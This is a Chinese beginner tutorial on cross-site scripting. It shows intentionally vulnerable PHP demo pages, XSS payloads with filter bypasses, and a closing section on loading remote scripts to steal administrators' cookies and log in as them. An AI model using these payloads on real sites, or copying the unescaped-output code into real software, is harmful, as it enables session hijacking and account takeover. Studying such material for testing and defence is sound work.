0×01 前言:
《xss***手法》一開始在互聯網上資料並不多(都是現成的代碼,沒有從基礎的開始),直到刺的《白帽子講WEB安全》和cn4rry的《XSS跨站腳本***剖析與防禦》纔開始好轉。
我這裏就不說什麼xss的歷史什麼東西了,xss是一門又熱門又不太受重視的Web***手法,爲什麼會這樣呢,原因有下:
1、耗時間 2、有一定機率不成功 3、沒有相應的軟件來完成自動化*** 4、前期需要基本的html、js功底,後期需要紮實的html、js、actionscript2/3.0等語言的功底 5、是一種被動的***手法 6、對website有http-only、crossdomian.xml沒有用
但是這些並沒有影響***對此漏洞的偏愛,原因不需要多,只需要一個
Xss幾乎每個網站都存在,google、baidu、360等都存在。
0×02 原理:
首先我們現在本地搭建個PHP環境(可以使用phpstudy安裝包安裝),然後在index.php文件裏寫入如下代碼:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>XSS原理重現</title></head><body><form action="" method="get"><input type="text" name="xss_input"><input type="submit"></form><hr><?php $xss = $_GET['xss_input'];echo '你輸入的字符爲<br>'.$xss;?></body></html>
然後,你會在頁面看到這樣的頁面
我們試着輸入abcd123,得到的結果爲
我們在看看源代碼
我們輸入的字符串被原封不動的輸出來了,那這裏我們提出來一個假設,假設我們在搜索框輸入<script>alert('xss')</script>會出現什麼呢?如果按照上面的例子來說,它應該存在第12行的<br>與</boby>之間,變成<br><script>alert('xss')</script></boby>,那應該會彈出對話框。
既然假設提出來,那我們來實現下這個假設成不成立吧。
我們輸入<script>alert('xss')</script>,得到的頁面爲
成功彈窗,這個時候基本上就可以確定存在xss漏洞。
我們在看看源代碼
看來,我們的假設成功了,這節就說說XSS的原理,下面幾節說說xss的構造和利用
0×03 xss利用輸出的環境來構造代碼 :
上節說了xss的原理,但是我們的輸出點不一在<br>和</boby>裏,可以出現在html標籤的屬性裏,或者其他標籤裏面。所以這節很重要,因爲不一定 當你輸入
<script>alert('xss')</script>就會彈窗。
先貼出代碼:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>XSS利用輸出的環境來構造代碼</title></head><body><center><h6>把我們輸入的字符串 輸出到input裏的value屬性裏</h6><form action="" method="get"><h6>請輸入你想顯現的字符串</h6><input type="text" name="xss_input_value" value="輸入"><br><input type="submit"></form><hr><?php
$xss = $_GET['xss_input_value'];if(isset($xss)){echo '<input type="text" value="'.$xss.'">';}else{echo '<input type="type" value="輸出">';}?></center></body></html>下面是代碼的頁面
這段代碼的作用是把第一個輸入框的字符串,輸出到第二個輸入框,我們輸入1,那麼第二個input裏的value值就是1,下面是頁面的截圖和源代碼的截圖(這裏我輸入<script>alert('xss')</script>來測試)
明顯的可以看到,並沒有彈出對話框,大家可能會疑惑爲什麼沒有彈窗呢,我們來看看源代碼
我們看到我們輸入的字符串被輸出到第15行input標籤裏的value屬性裏面,被當成value裏的值來顯現出來,所以並沒有彈窗,這時候我們該怎麼辦呢?聰明的人已經發現了可以在<script>alert('xss')</script>前面加個">來閉合input標籤。所以應該得到的結果爲
成功彈窗了,我們在看看這時的頁面
看到後面有第二個input輸入框後面跟有">字符串,爲什麼會這樣呢,我們來看看源代碼
這時可以看到我們構造的代碼裏面有兩個">,第一個">是爲了閉合input標籤,所以第二個">就被拋棄了,因爲html的容錯性高,所以並沒有像php那樣出現錯誤,而是直接把多餘的字符串來輸出了,有的人是個完美主義者,不喜歡有多餘的字符串被輸出,這時該怎麼辦呢?
這裏我問大家一個問題,我之前說的xss代碼裏,爲什麼全是帶有標籤的。難道就不能不帶標籤麼?!答:當然可以。既然可以不用標籤,那我們就用標籤裏的屬性來構造XSS,這樣的話,xss代碼又少,又不會有多餘的字符串被輸出來。
還是這個環境,但是不能使用標籤,你應該怎麼做。想想input裏有什麼屬性可以調用js,html學的好的人,應該知道了,on事件,對的。我們可以用on事件來進行彈窗,比如這個xss代碼 我們可以寫成" onclick="alert('xss')
這時,我們在來試試,頁面會發生什麼樣的變化吧。
沒有看到彈窗啊,失敗了麼?答案當然是錯誤的,因爲onclick是鼠標點擊事件,也就是說當你的鼠標點擊第二個input輸入框的時候,就會觸發onclick事件,然後執行alert('xss')代碼。我們來試試看
當我點擊後,就出現了彈窗,這時我們來看看源代碼把
第15行,value值爲空,當鼠標點擊時,就會彈出對話框。這裏可能就會有人問了,如果要點擊纔會觸發,那不是很麻煩麼,成功率不就又下降了麼。我來幫你解答這個問題,on事件不止onclick這一個,還有很多,如果你想不需要用戶完成什麼動作就可以觸發的話,i可以把onclick改成
Onmousemove 當鼠標移動就觸發
Onload 當頁面加載完成後觸發
還有很多,我這裏就不一一說明了,有興趣的朋友可以自行查詢下。
別以爲就這樣結束了,還有一類環境不能用上述的方法,
那就是如果在<textarea>標籤裏呢?!或者其他優先級比script高的呢?
就下面這樣
這時我們該怎麼辦呢?既然前面都說了閉合屬性和閉合標籤了,那能不能閉合完整的標籤呢,答案是肯定的。我們可以輸入</textarea><script>alert('xss')</script>就可以實現彈窗了
0×04 過濾的解決辦法
假如說網站禁止過濾了script 這時該怎麼辦呢,記住一句話,這是我總結出來的“xss就是在頁面執行你想要的js”不用管那麼多,只要能運行我們的js就OK,比如用img標籤或者a標籤。我們可以這樣寫
<img scr=1 onerror=alert('xss')>當找不到圖片名爲1的文件時,執行alert('xss')<a href=javascrip:alert('xss')>s</a> 點擊s時運行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執行彈窗等等有很多的方法,不要把思想總侷限於一種上面,記住一句話“xss就是在頁面執行你想要的js”其他的管他去。(當然有的時候還有管他…)
0×05 xss的利用
說了那麼多,大家可能都以爲xss就是彈窗,其實錯了,彈窗只是測試xss的存在性和使用性。
這時我們要插入js代碼了,怎麼插呢?
你可以這樣
<script scr="js_url"></script>
也可以這樣
<img src=x onerror=appendChild(createElement('script')).src='js_url' />各種姿勢,各種插,只要鞥運行我們的js就OK。那運行我們的js有什麼用呢?
Js可以幹很多的事,可以獲取cookies(對http-only沒用)、控制用戶的動作(發帖、私信什麼的)等等。
比如我們在網站的留言區輸入<script scr="js_url"></script>當管理員進後臺瀏覽留言的時候,就會觸發,然後管理員的cookies和後臺地址還有管理員瀏覽器版本等等你都可以獲取到了,再用“桂林老兵cookie欺騙工具”來更改你的cookies,就可以不用輸入賬號 密碼 驗證碼 就可以以管理員的方式來進行登錄了。
至於不會js的怎麼寫js代碼呢,放心網上有很多xss平臺,百度一下就可以看到了。頁面是傻瓜式的操作,這裏就不再過多的說明了。
有興趣的朋友,下面是cn4rry給我的幾個xss平臺,大家可以自己鑽研與研究,也可以自己搭建
http://pan.baidu.com/s/1jG418Aq(8.13日更新)
在發佈此文章的時候,我特地和cn4rry談了一下,得到的結果是,我會繼續寫這個系列的。當我把這個doc發給cn4rry的時候,他就直接來句“嗯 寫的比較基礎”,我本來的打算是寫一個xss入門的就可以了,我只是感覺 現在網上的文章從簡單開始介紹xss的比較少,都是在書裏有
所以 我想在網上把他講的細點 xss入門就可以了,後面的路 就可以自己摸索了
但是和他談過後,感覺還是要繼續寫下去,因爲“xss盲打”“xss編碼繞過”“fuzzing xss”等等,如果是自己慢慢琢磨的話,需要較長的時間,所以我打算每過一段時間就會推出下一個xss的文章,寫個系列出來。